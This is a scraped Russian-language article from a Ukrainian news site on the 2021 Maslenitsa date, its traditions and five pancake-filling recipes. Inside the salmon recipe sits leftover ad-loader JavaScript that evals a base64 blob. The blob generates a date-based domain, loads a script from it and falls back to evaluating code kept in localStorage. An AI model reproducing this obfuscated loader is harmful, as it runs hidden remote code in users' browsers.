Когда Масленица в 2021 году: дата, традиции и рецепты

Масленица в 2021 году выпадает на 14 марта, а Масленичная неделя начнется 8 марта.

Дата праздника каждый год разная, поскольку начинается он за неделю до Великого поста и за 56 дней до Пасхи – переходящего христианского торжества, которое отмечается по лунно-солнечному календарю.

Как правило, Масленица приходится на конец февраля – начало марта и в народном представлении занимает промежуточное место между зимой и весной.

Наши предки посредством различных обрядов и ритуалов отмечали окончание холодов и наступление теплой поры. Особое место отводилось огню – во время гуляний жгли костры, колеса и чучела, что символизировало культ солнца, царивший в Киевской Руси.

Кроме того, в это время по всей территории современной Украины отмечался Колодий, или Бабья неделя, в течение которой мужчинам полагалось слушать женщин и терпеть их шутливые издевательства.

Одно из традиционных блюд Масленицы – блины, символизирующие солнце, которое в это время разгорается все ярче, удлиняя дни.

Рецепт блинов обычно у всех кулинаров обычно схож (яйца, сахар, молоко или вода и мука). Но вот начинки для блинов можно сделать какие угодно — и сладкие, и соленые. Предлагаем топ-5 разных необычных начинок.

Вариант 1: С тыквой и мягким сыром

Ингредиенты 400 г тыквы; 15 мл оливкового масла; 100 мл овощного бульона; 50 г любой зелени; 50 г мягкого сыра, например козьего или брынзы.

Приготовление. Нарежьте сырую тыкву небольшими кубиками, выложите на сковороду с оливковым маслом и обжарьте на медленном огне до золотистого цвета. Добавьте овощной бульон и тушите тыкву 10 минут или чуть дольше, пока она не станет мягкой. Слейте лишнюю жидкость. Добавьте к тыкве мелко порубленную зелень и сыр. Выложите смесь на блины и сверните их в конвертики.

Вариант 2. С лососем и укропом

Ингредиенты 300 г филе лосося; 200 г шампиньонов; 170 мл голландского соуса; 2 веточки укропа; 30 г сливочного масла; чёрный молотый перец по вкусу.

Приготовление. Шампиньоны помойте, нарежьте и обжарьте на сливочном масле в течение 5 минут, пока не станут мягкими. Филе лосося отварите (4–5 минут). Укроп покрошите и смешайте с голландским соусом. В центр каждого блина выложите понемногу рыбы, грибов, полейте соусом и поперчите. Блины сверните треугольниками и отправьте на противень с высокими бортами. Сверху залейте блины остатками соуса. Выпекайте 10–15 минут при температуре 180 ºС. Подавайте горячими. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

Вариант 3. Крабовая

Ингредиенты: 200 г крабовых палочек; 200 мл молока; 2 куриных яйца; 150 г зелёного горошка; 2 столовые ложки муки; 2 столовые ложки сливочного масла; 2 пёрышка зелёного лука; соль по вкусу.

Приготовление. Сначала сделайте соус. Для этого масло растопите, добавьте муку и варите на среднем огне 2 минуты, постоянно помешивая. Затем влейте молоко, не переставая мешать, и варите до загустения ещё около 5 минут. Посолите по вкусу и снимите с огня.

Вариант 4. Яичная

Ингредиенты. 6 куриных яиц; 1 пучок зелёного лука; соль и майонез по вкусу.

Приготовление. Яйца сварите вкрутую, почистите и мелко порубите. Так же мелко нарежьте зелёный лук. Смешайте ингредиенты, добавьте немного майонеза (лучше домашнего) и посолите. Начинкой нафаршируйте блины.

Вариант 5. Ореховая

Ингредиенты. 500 мл молока; 120 г сахара; 100 г смеси молотых орехов (фундук, миндаль, грецкие и другие); 120 г сливочного масла; 1 столовая ложка муки; ореховый сироп.

Приготовление. В сотейнике смешайте молоко, орехи и муку и поставьте его на средний огонь. Варите, пока масса не загустеет. Снимите с огня, остудите, добавьте размягчённое сливочное масло и взбейте смесь при помощи миксера. Затем добавьте немного орехового сиропа и перемешайте.

С принятием христианства праздник наполнился новым смыслом. Неделя Масленицы, Сырная седмица, стала завершающим этапом подготовки к Великому посту, когда верующие должны приблизиться к покаянию, прощению всех обид и примирению с ближними.

Завершается Масленица Прощеным воскресеньем. В этот день в храмах совершается чин прощения: священнослужители и прихожане просят друг у друга прощения, чтобы войти в Великий пост с чистой душой.

Подписывайтесь на Акцент в

(adsbygoogle = window.adsbygoogle || []).push({});

Источник: https://akzent.zp.ua/kogda-maslenitsa-v-2021-godu-data-traditsii-i-retsepty/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

нет
scroll to top